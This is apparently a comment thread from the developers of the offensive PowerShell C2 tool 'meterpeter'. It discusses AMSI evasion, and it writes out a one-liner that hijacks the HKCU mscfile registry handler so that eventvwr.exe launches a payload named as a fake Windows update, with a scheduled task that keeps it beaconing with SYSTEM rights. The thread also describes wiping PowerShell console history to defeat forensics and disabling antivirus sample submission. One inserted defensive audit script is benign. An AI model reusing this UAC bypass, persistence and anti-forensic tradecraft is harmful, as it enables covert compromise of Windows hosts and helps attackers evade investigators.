AMSI Evasion
Or more tests ✅💯🔥
I am currently adding a privilege escalation module to it (SDCLT)...
Remember that this bypass technique is only valid for the current process console...
(If you open another console, then AMSI will be active and working.)
Oh wow, nice ✅💯🔥, thank you. Learning a lot from you, thank you!
You can get the latest version of meterpeter here: https://github.com/r00t-3xp10it/meterpeter
Cool, adding link to Meterpeter vid ✅💯🔥
I am having problems triggering SDCLT priv escal...
So... I am going with this one, 'enigma_fileless_uac_bypass.rb', which I know works (tomorrow)...
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/local-privilege-escalation/enigma_fileless_uac_bypass.rb
Hey @codings9, look at this one that I've just discovered... (pure luck)...
While testing meterpeter [search for passwords in text files]...
I have noticed one file that's storing all commands being executed in PowerShell by the meterpeter client or simply by using the PS prompt...
LOOK AT THE AMOUNT OF INFO THAT THIS FILE CONTAINS ABOUT THE PS CONSOLE PROCESS... WOW... IT HAS THE WHOLE SCRIPT STORED...
"I think to myself, from a forensic perspective"... BUSTED...
So... I immediately reacted to this threat... by... rewriting the contents of that file in modules like [dellogs] or [listpass]...
🥇
Wow, that's amazing ✅💯🔥, so PowerShell keeps logs?
In ConsoleHost_History. Wow, great catch!
Note-to-self (priv escal in persistence)
1 - persistence scheduled every 10 minutes
schtasks /create /sc minute /mo 10 /tn "taskname" /tr %tmp%\update-KB132645.vbs
2 - privilege escalation using the fileless eventvwr technique
- a) add HKCU key pointing to the client trigger.vbs file
- b) schedule eventvwr to start every 10 minutes
- schtasks at restart will start eventvwr, eventvwr starts the client trigger.vbs, client starts with SYSTEM privileges... <- we just need to restart the target and start the meterpeter listener to wait for the connection...
New-ItemProperty HKCU\...\trigger-Client.vbs
schtasks .... eventvwr.exe
3 - restart target machine
4 - start meterpeter to receive the SYSTEM connection
Privilege Escalation in one line (oneliner)
- 1º - reg add HKCU.. /d 'PS command to start client.ps1'
'This reg key will auto-elevate to SYSTEM the child process spawned (Client.ps1)'
- 2º - Schedule task to start eventvwr.exe every xx minutes (defined by attacker)
'This function allows us time to restart meterpeter to receive the connection again from Client'
- 3º - Restart meterpeter to receive the SYSTEM connection back
'This function will also allow us to persist our payload; the difference is that Client will beacon home every xx minutes, compared with the other meterpeter persistence modules'
$Command = "cmd /R REG ADD 'HKCU\Software\Classes\mscfile\shell\open\command' /ve /t REG_SZ /d 'cmd /R powershell -Execution Bypass -w 1 -NoProfile -File %tmp%\Update-KB4524147.ps1';schtasks /create /sc minute /mo $stime /tn `"KB4524147`" /tr `"%windir%\system32\eventvwr.exe`";schtasks /Query /tn `"KB4524147`" `> dellog.txt;write-host "`n`n" `>`> dellog.txt;echo `" Privilege Escalation beacons every: $stime (minuts)`" `>`> dellog.txt;echo `" Restart 'meterpeter' to recive the SYSTEM connection.`" `>`> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force";
IT DOES NOT WORK: AV FLAGS THIS REGKEY ....
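As an added defender-side example (not code from the gist or from the meterpeter project), the script below audits a Windows host for the artifacts this note-to-self describes: a per-user mscfile handler key under HKCU, scheduled tasks whose action launches eventvwr.exe, and the state of the PSReadLine ConsoleHost_history file. The regex and the history file path are assumptions about standard Windows locations; it only reports and changes nothing.

```powershell
# Added example (not part of the gist or the meterpeter project): a read-only
# audit for the eventvwr/mscfile and persistence artifacts described above.
# Written for Windows PowerShell 5.1 with the ScheduledTasks module present.

function Get-MscfileHijackArtifact {
    # On a clean host the mscfile handler lives under HKLM/HKCR only; a per-user
    # copy under HKCU is the hallmark of the eventvwr.exe technique in the note.
    $keyPath = 'HKCU:\Software\Classes\mscfile\shell\open\command'
    if (Test-Path $keyPath) {
        $value = (Get-ItemProperty -Path $keyPath).'(default)'
        [PSCustomObject]@{ Artifact = 'Registry'; Location = $keyPath; Detail = $value }
    }
}

function Get-EventvwrTaskArtifact {
    # Event Viewer is an interactive tool; a scheduled task that launches it
    # (here on a minute trigger) has no legitimate administrative purpose.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if ($action.Execute -match 'eventvwr(\.exe)?$') {
                [PSCustomObject]@{
                    Artifact = 'ScheduledTask'
                    Location = "$($task.TaskPath)$($task.TaskName)"
                    Detail   = "$($action.Execute) $($action.Arguments)".Trim()
                }
            }
        }
    }
}

function Get-ConsoleHistoryState {
    # PSReadLine records interactive commands in ConsoleHost_history.txt (assumed
    # default path). A zero-length or freshly rewritten file on a host whose user
    # works in PowerShell daily deserves a second look, as the note explains.
    $history = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
    if (Test-Path $history) {
        $item = Get-Item $history
        [PSCustomObject]@{
            Artifact = 'History'
            Location = $history
            Detail   = "size=$($item.Length) bytes, lastWrite=$($item.LastWriteTime)"
        }
    }
}

$findings = @(Get-MscfileHijackArtifact) + @(Get-EventvwrTaskArtifact) + @(Get-ConsoleHistoryState)
if ($findings.Count -eq 0) { 'No mscfile/eventvwr artifacts found.' } else { $findings | Format-Table -AutoSize }
```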
Hey @codings9, I am porting the meterpeter project to venom...
I need you to test something for me...
- execute in bash terminal
which powershell
And report back whether this command checks for a PowerShell install under Linux distros
- Question: were you required to do
chmod +x meterpeter.ps1
????
Hey @codings9, I am porting the meterpeter project to venom...
I need you to test something for me...
execute in bash terminal
which powershell
which powershell does not execute.
To execute PowerShell in Kali I have to use
pwsh to get the PowerShell shell.
And report back whether this command checks for a PowerShell install under Linux distros
Question: were you required to do chmod +x meterpeter.ps1 ????
No, not required under pwsh.
Reference:
https://youtu.be/CmMbWmN246E
When you execute which powershell
in the bash terminal... what's the response???
I don't want to start PowerShell (which presents the installed application's full path)
Check these locations.
/usr/bin/pwsh
/opt/microsoft/powershell
/usr/local/share/powershell/Modules
/usr/bin/pwsh
Exists, they reference PowerShell as pwsh 😂🤣
So we are looking for pwsh not powershell, lol
which pwsh?
/usr/bin/pwsh
Excellent...
which pwsh?
/usr/bin/pwsh
I need to know if the venom user has PowerShell installed before running meterpeter.ps1... <--- checking the existence of this folder works fine...
And I need to know if the attacker is x64-bit arch (M$ does not give PS to x32 bits)... <--- already done...
Sweet✅💯🔥
TASK
- Record 'meterpeter' [Windows vs Windows] official release video...
Task Description
Hey @codings9, I need your help again...
To record a video tutorial about 'meterpeter' Windows VS Windows...
using the 'new Windows Terminal' configured to run the meterpeter tool...
New Windows Terminal (M$)
Step-By-Step
- 1º - Download new meterpeter project (official release)
git clone https://github.com/r00t-3xp10it/meterpeter.git
- 2º - Install new Windows Terminal (under Windows distros)
- 3º - Download/install new Microsoft font (Cascadia.ttf): Microsoft Cascadia Code Font
- 4º - Add meterpeter tool to the new terminal TAB list
Remember to change the PATHs to point to your local meterpeter installation
1º - Create a new GUID for the meterpeter tool
To create a new GUID visit: http://new-guid.com/
2º - Press the <'settings'> button in 'new terminal' and copy-paste the following code under
"profiles": -> "list":
}, // <-- REMEMBER TO ADD A , AFTER THE PREVIOUS CLOSING BRACKET
// BEFORE ADDING A NEW PROFILE TO YOUR PROFILE.JSON FILE
{
// Make changes here to the meterpeter profile
"guid": "{1972e6a7-daef-4cfc-8180-3eecfef9630d}",
"name": "meterpeter C2",
"fontFace": "Cascadia Code",
"backgroundImageStretchMode" : "uniformToFill",
"backgroundImage" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\darkside.gif", // <-- Terminal animated background gif Path
"commandline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NoExit -File \"%USERPROFILE%\\Desktop\\meterpeter\\meterpeter.ps1\"", // <-- meterpeter.ps1 script Path
"startingDirectory" : "%USERPROFILE%\\Desktop\\meterpeter", // <-- meterpeter folder Path
"icon" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\Alien-icon.png", // <-- Terminal tab icon Path
"hidden": false
}
[i] My profile.json file (configuration example)
[i] meterpeter WIKI pages
Doing the video, just be aware that the ps1 file was not downloaded via the bat; I manually moved it to disk and ran it. And Windows picks up the file as soon as it touches disk, sample submission off. I had to allow it for the video. I think I understand why Microsoft bought GitHub... now... they have access to all of this... code... Don't worry, it will not show on video.
The Terminal is amazing, love the integration with MeterPeter ✅💯🔥
Hey, thanks... I've just arrived home...
Lol, no worries, anytime... ✅💯🔥, thank you!
👍
Let me know when I can do the video ✅💯🔥